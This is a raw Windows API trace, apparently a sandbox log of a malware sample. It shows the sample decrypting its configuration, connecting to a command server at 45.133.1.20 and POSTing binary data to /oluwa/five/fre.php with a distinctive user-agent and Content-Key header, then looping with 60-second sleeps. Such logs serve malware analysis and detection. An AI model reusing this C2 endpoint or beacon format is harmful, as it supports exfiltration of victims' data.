[0207.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0207.556] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0207.556] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0207.557] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0207.557] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0207.558] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0207.558] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0207.559] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0207.559] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0207.559] GetProcessHeap () returned 0x6a0000 [0207.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0207.559] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0207.559] GetProcessHeap () returned 0x6a0000 [0207.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0207.560] GetProcessHeap () returned 0x6a0000 [0207.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0207.561] GetProcessHeap () returned 0x6a0000 [0207.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0207.562] GetProcessHeap () returned 0x6a0000 [0207.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0207.563] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.563] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0207.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.571] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0207.580] GetProcessHeap () returned 0x6a0000 [0207.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0207.581] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.581] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0207.582] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.582] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0207.583] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.583] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0207.583] GetProcessHeap () returned 0x6a0000 [0207.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0207.584] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.585] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0207.586] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.587] CryptDestroyKey (hKey=0x6ad020) returned 1 [0207.588] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.588] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0207.588] GetProcessHeap () returned 0x6a0000 [0207.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0207.589] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0207.589] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0207.590] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0207.590] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0207.591] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0207.591] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0207.592] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0207.592] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0207.592] GetProcessHeap () returned 0x6a0000 [0207.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0207.592] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0207.592] GetProcessHeap () returned 0x6a0000 [0207.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baae0 [0207.593] socket (af=2, type=1, protocol=6) returned 0x58c [0207.593] connect (s=0x58c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0207.619] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0207.619] GetProcessHeap () returned 0x6a0000 [0207.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0207.619] GetProcessHeap () returned 0x6a0000 [0207.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c6720 [0207.620] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0207.621] wvsprintfA (in: param_1=0x6c6720, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0207.621] GetProcessHeap () returned 0x6a0000 [0207.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0207.621] GetProcessHeap () returned 0x6a0000 [0207.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 [0207.622] GetProcessHeap () returned 0x6a0000 [0207.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0207.622] GetProcessHeap () returned 0x6a0000 [0207.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c6720 [0207.623] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0207.624] wvsprintfA (in: param_1=0x6c6720, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0207.624] GetProcessHeap () returned 0x6a0000 [0207.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0207.624] GetProcessHeap () returned 0x6a0000 [0207.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 [0207.624] send (s=0x58c, buf=0x6b5c98*, len=242, flags=0) returned 242 [0207.625] send (s=0x58c, buf=0x6bb998*, len=159, flags=0) returned 159 [0207.625] GetProcessHeap () returned 0x6a0000 [0207.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0207.625] recv (in: s=0x58c, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0207.714] GetProcessHeap () returned 0x6a0000 [0207.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0207.714] GetProcessHeap () returned 0x6a0000 [0207.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0207.715] GetProcessHeap () returned 0x6a0000 [0207.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0207.716] GetProcessHeap () returned 0x6a0000 [0207.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0207.716] closesocket (s=0x58c) returned 0 [0207.716] GetProcessHeap () returned 0x6a0000 [0207.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baae0 | out: hHeap=0x6a0000) returned 1 [0207.717] GetProcessHeap () returned 0x6a0000 [0207.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0207.717] GetProcessHeap () returned 0x6a0000 [0207.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0207.718] GetProcessHeap () returned 0x6a0000 [0207.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0207.718] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xb1c) returned 0x58c [0207.720] Sleep (dwMilliseconds=0xea60) [0207.722] GetProcessHeap () returned 0x6a0000 [0207.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0207.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.723] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0207.730] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.730] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0207.739] GetProcessHeap () returned 0x6a0000 [0207.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c7de8 [0207.740] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.740] CryptImportKey (in: hProv=0x6bec18, pbData=0x6c7de8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0207.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.742] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0207.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.744] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0207.744] GetProcessHeap () returned 0x6a0000 [0207.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7de8 | out: hHeap=0x6a0000) returned 1 [0207.745] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.773] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0207.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.774] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0207.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.776] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0207.776] GetProcessHeap () returned 0x6a0000 [0207.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0207.777] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0207.777] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0207.778] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0207.778] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0207.779] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0207.779] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0207.780] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0207.780] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0207.780] GetProcessHeap () returned 0x6a0000 [0207.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0207.781] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0207.781] GetProcessHeap () returned 0x6a0000 [0207.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0207.782] GetProcessHeap () returned 0x6a0000 [0207.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0207.784] GetProcessHeap () returned 0x6a0000 [0207.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0207.785] GetProcessHeap () returned 0x6a0000 [0207.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0207.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.786] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0207.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.796] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0207.805] GetProcessHeap () returned 0x6a0000 [0207.806] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0207.806] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.807] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0207.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.808] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0207.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.810] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0207.810] GetProcessHeap () returned 0x6a0000 [0207.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0207.812] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.812] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0207.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.814] CryptDestroyKey (hKey=0x6ad020) returned 1 [0207.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0207.816] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0207.816] GetProcessHeap () returned 0x6a0000 [0207.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0207.817] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0207.817] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0207.818] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0207.818] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0207.819] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0207.819] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0207.819] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0207.820] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0207.820] GetProcessHeap () returned 0x6a0000 [0207.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0207.820] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0207.820] GetProcessHeap () returned 0x6a0000 [0207.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa10 [0207.820] socket (af=2, type=1, protocol=6) returned 0x590 [0207.822] connect (s=0x590, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0207.915] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0207.915] GetProcessHeap () returned 0x6a0000 [0207.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0207.915] GetProcessHeap () returned 0x6a0000 [0207.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c7f00 [0207.916] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0207.917] wvsprintfA (in: param_1=0x6c7f00, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0207.917] GetProcessHeap () returned 0x6a0000 [0207.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c9f28 [0207.917] GetProcessHeap () returned 0x6a0000 [0207.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0207.918] GetProcessHeap () returned 0x6a0000 [0207.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0207.918] GetProcessHeap () returned 0x6a0000 [0207.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c7f00 [0207.919] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0207.920] wvsprintfA (in: param_1=0x6c7f00, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0207.920] GetProcessHeap () returned 0x6a0000 [0207.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0207.920] GetProcessHeap () returned 0x6a0000 [0207.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0207.921] send (s=0x590, buf=0x6bd460*, len=242, flags=0) returned 242 [0207.922] send (s=0x590, buf=0x6bb998*, len=159, flags=0) returned 159 [0207.922] GetProcessHeap () returned 0x6a0000 [0207.922] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0207.922] recv (in: s=0x590, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0208.006] GetProcessHeap () returned 0x6a0000 [0208.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0208.006] GetProcessHeap () returned 0x6a0000 [0208.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0208.007] GetProcessHeap () returned 0x6a0000 [0208.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c9f28 | out: hHeap=0x6a0000) returned 1 [0208.007] GetProcessHeap () returned 0x6a0000 [0208.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0208.007] closesocket (s=0x590) returned 0 [0208.008] GetProcessHeap () returned 0x6a0000 [0208.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa10 | out: hHeap=0x6a0000) returned 1 [0208.008] GetProcessHeap () returned 0x6a0000 [0208.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0208.009] GetProcessHeap () returned 0x6a0000 [0208.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0208.009] GetProcessHeap () returned 0x6a0000 [0208.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0208.009] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x574) returned 0x590 [0208.026] Sleep (dwMilliseconds=0xea60) [0208.027] GetProcessHeap () returned 0x6a0000 [0208.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0208.028] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.029] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0208.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.046] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0208.057] GetProcessHeap () returned 0x6a0000 [0208.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b6d28 [0208.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.062] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b6d28, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0208.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.067] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0208.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.069] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0208.069] GetProcessHeap () returned 0x6a0000 [0208.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6d28 | out: hHeap=0x6a0000) returned 1 [0208.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.071] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0208.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.072] CryptDestroyKey (hKey=0x6ad020) returned 1 [0208.073] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.073] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0208.073] GetProcessHeap () returned 0x6a0000 [0208.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0208.074] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.075] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0208.075] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.076] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0208.077] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.077] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0208.078] 